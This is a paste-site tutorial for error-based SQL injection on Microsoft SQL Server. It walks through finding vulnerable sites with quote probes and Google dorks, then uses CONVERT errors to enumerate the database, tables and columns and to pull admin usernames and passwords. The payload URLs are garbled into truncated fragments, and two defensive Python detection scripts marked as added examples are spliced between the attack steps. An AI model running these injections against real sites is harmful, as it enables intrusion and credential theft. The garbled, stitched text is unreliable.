Netikerty

Another SQL

Feb 18th, 2013
I hope you will enjoy it....

Let's start...

There are various types of SQL injection for Microsoft SQL Server, as follows:

1) ODBC Error Message Attack with "CONVERT"
2) ODBC Error Message Attack with "HAVING" and "GROUP BY"
3) MSSQL Injection with UNION Attack
4) MSSQL Injection in Web Services (SOAP Injection)
5) MSSQL Blind SQL Injection Attack

I will be explaining the various methods of SQLi in my various tuts..
So for now we will start with the easiest method of SQLi, using CONVERT.

STEP 1:
First we need to find a vulnerable site.

Add a single quote ('), a double quote (") or a semicolon (;) to the field under test.

eg
IANA — Example domains'
IANA — Example domains

It's vulnerable to SQL injection if the output shows an error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

The error could also look something like this:

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If errors like the above are shown, then the site could be vulnerable to SQL injection.
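As an added example, not part of the original paste: a small Python classifier for the three kinds of ASP/ODBC error page quoted in this tutorial, so a site owner can scan their own application's responses or error logs and see whether a query merely broke (80040e14), leaked a value through CONVERT (80040e07) or ran into an empty recordset (800a0bcd). The sample bodies are constructed from the errors quoted on this page; the function and dictionary names are my own.

```python
import re

# Constructed samples modelled on the error texts quoted in this tutorial (not real responses).
SAMPLES = {
    "probe": "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
             "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the\n"
             "character string ''.\n/news.asp, line 52",
    "leak": "Microsoft OLE DB Provider for SQL Server error '80040e07'\n\n"
            "Conversion failed when converting the nvarchar value 'IPC' to data type int.\n\n"
            "/includes/templates/header.asp, line 21",
    "eof": "ADODB.Field error '800a0bcd'\nEither BOF or EOF is True, or the current record has "
           "been deleted. Requested operation requires a current record.\n/page.asp, line 22",
    "ok": "<html><body>Welcome</body></html>",
}

ERROR_CODE = re.compile(r"error '([0-9a-fA-F]{8})\s*'")
# The leaked value may span lines (the version string quoted later does), hence re.S.
LEAKED_VALUE = re.compile(r"converting the nvarchar value '(.*?)\s*' to data type int", re.S)
SCRIPT_LINE = re.compile(r"^(/\S+), line (\d+)", re.M)

# What each quoted error code tells a defender reviewing responses or application logs.
KIND = {
    "80040e14": "syntax-error-disclosed",  # a quote/semicolon probe broke the query
    "80040e07": "data-leak",               # CONVERT(int, ...) pushed a value into the error text
    "800a0bcd": "empty-recordset",         # BOF/EOF: an enumeration ran out of rows
}

def classify_response(body):
    """Return None for a clean page, else a finding dict for a disclosed database error."""
    m = ERROR_CODE.search(body)
    if not m:
        return None
    code = m.group(1).lower()
    finding = {"code": code, "kind": KIND.get(code, "other-db-error"),
               "leaked": None, "script": None, "line": None}
    if code == "80040e07":
        v = LEAKED_VALUE.search(body)
        if v:
            finding["leaked"] = " ".join(v.group(1).split())  # collapse wrapped lines
    s = SCRIPT_LINE.search(body)
    if s:
        finding["script"], finding["line"] = s.group(1), int(s.group(2))
    return finding

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, classify_response(body))
```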

Also you can find vulnerable sites with a Google dork.

eg

inurl:page.asp?id=
inurl:index.asp?sid=

STEP 2:

Now we've got our vulnerable website.
The CONVERT function is used to convert between two data types, and when the given
data cannot be converted to the target type, an error is returned.

Now we start our assessment by finding the MSSQL version and the DB name.

IANA — Example domains

[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/includes/templates/header.asp, line 21

-----------------------------------------------------------

We now know it's Microsoft SQL Server 2005 and the OS is Windows 2003 Server (Build 3790: Service Pack 2).

Let's go on to enumerate the DB name.

IANA — Example domains

[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'IPC' to data type int.

/includes/templates/header.asp, line 21
------------------------------------------------------------

The database name is IPC.

IANA — Example domains

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The database in use is ipcdc....

STEP 3:
NOW LET'S FIND THE TABLES IN THE DATABASE

IANA — Example domains e_name+from+information_schema.tables))--

"information_schema.tables" stores information about the tables in the database, and it has a field called "table_name"
which stores the name of each table. "SELECT TOP 1" will show the first table in the database.
The result of this request is something like this:

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Therefore, from this error, we know the first table = "siteStatus". The next step is looking for the second table.
We only need to append a WHERE clause to the query in the request above.
IANA — Example domains e_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Second table: 'headerGraphic'
IANA — Example domains e_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
Third table: 'admin'

Like this you will get each table name from the error.
IANA — Example domains e_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic','admin')))--

If the query returns something like this:

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

IT MEANS THE DATABASE CONTAINS ONLY 3 TABLES: 'siteStatus', 'headerGraphic' and 'admin'.

STEP 4:
Now we are all set.....and we will find the columns in the admin table.

We merely change "information_schema.tables" to "information_schema.columns" and "table_name" to "column_name",
but we have to add "table_name" to the WHERE clause in order to specify the table we will pull the column names from.
IANA — Example domains mn_name+from+information_schema.columns+where+table_name='admin'))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
IANA — Example domains mn_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--

The response will be:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'passwd' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
So the 2nd column is 'passwd'.


DO THIS LIKE WE DID THE URL MANIPULATION FOR TABLES....
DON'T FORGET TO ADD THE WHERE CLAUSE,
UNTIL YOU GET AN ERROR LIKE THIS:
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------
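An added example, not from the original paste: detection logic for the request side of steps 3 and 4, run over constructed IIS W3C-style log lines modelled on this walk-through. It URL-decodes the query string, flags CONVERT(int, ...), information_schema lookups and the growing NOT IN (...) exclusion list, and reports per client how far an enumeration has progressed; the log lines, IP addresses and function names are all made up for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines modelled on the tutorial's walk-through (not real traffic).
LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-02-18 10:00:01 203.0.113.5 GET /page.asp id=1 200
2013-02-18 10:00:02 203.0.113.5 GET /page.asp id=1' 500
2013-02-18 10:00:05 203.0.113.5 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2013-02-18 10:00:09 203.0.113.5 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))-- 500
2013-02-18 10:00:12 203.0.113.5 GET /page.asp id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))-- 500
2013-02-18 10:00:20 198.51.100.7 GET /page.asp id=42 200
"""

# Signatures for the CONVERT walk-through; matched against the URL-decoded query string.
SIGNATURES = [
    ("convert-int-probe", re.compile(r"convert\s*\(\s*int\s*,", re.I)),
    ("schema-enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("not-in-pagination", re.compile(r"\bnot\s+in\s*\(", re.I)),
    ("quote-probe", re.compile(r"'\s*$")),
]

def scan_iis_log(text):
    """Return (findings, depth): flagged requests and, per client IP, the longest NOT IN list seen."""
    fields, findings = None, []
    depth = defaultdict(int)
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split(" ", len(fields) - 1)))
        query = unquote_plus(rec.get("cs-uri-query", ""))
        hits = [name for name, rx in SIGNATURES if rx.search(query)]
        if not hits:
            continue
        # Names already excluded via NOT IN (...) show how far the enumeration has progressed.
        excluded = re.findall(r"'([^']*)'", query) if "not-in-pagination" in hits else []
        depth[rec["c-ip"]] = max(depth[rec["c-ip"]], len(excluded))
        findings.append({"time": rec["time"], "ip": rec["c-ip"], "stem": rec["cs-uri-stem"],
                         "status": int(rec["sc-status"]), "hits": hits, "excluded": excluded})
    return findings, dict(depth)

if __name__ == "__main__":
    for f in scan_iis_log(LOG)[0]:
        print(f)
```

A run of 500s from one client whose NOT IN list grows by one name per request is the enumeration loop described in steps 3 and 4, and is the pattern to alert on.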
  436.  
STEP 5: RETRIEVING USERNAME AND PASSWORD etc

Now let's see what we got from above:

table_name: 'admin', 'siteStatus' and 'headerGraphic'

Here we are interested in 'admin'. So we found the columns of 'admin':

column_name: 'username' and 'passwd'

LET'S do our work now

IANA — Example domains name+from+admin))--
You will get the first username in the error
eg sa_admin
IANA — Example domains wd+from+admin))--

You will get the passwd.
eg comic123


So you own the MSSQL server with

USERNAME: sa_admin
PASSWORD: comic123
[note:
1) you can use AND/OR both
2) Don't forget the , (comma) after 'int' in convert()
3) In the error, what follows the ' (upper comma) is your table_name or column_name etc
4) you can enumerate more usernames and passwords by using the 'not in' clause]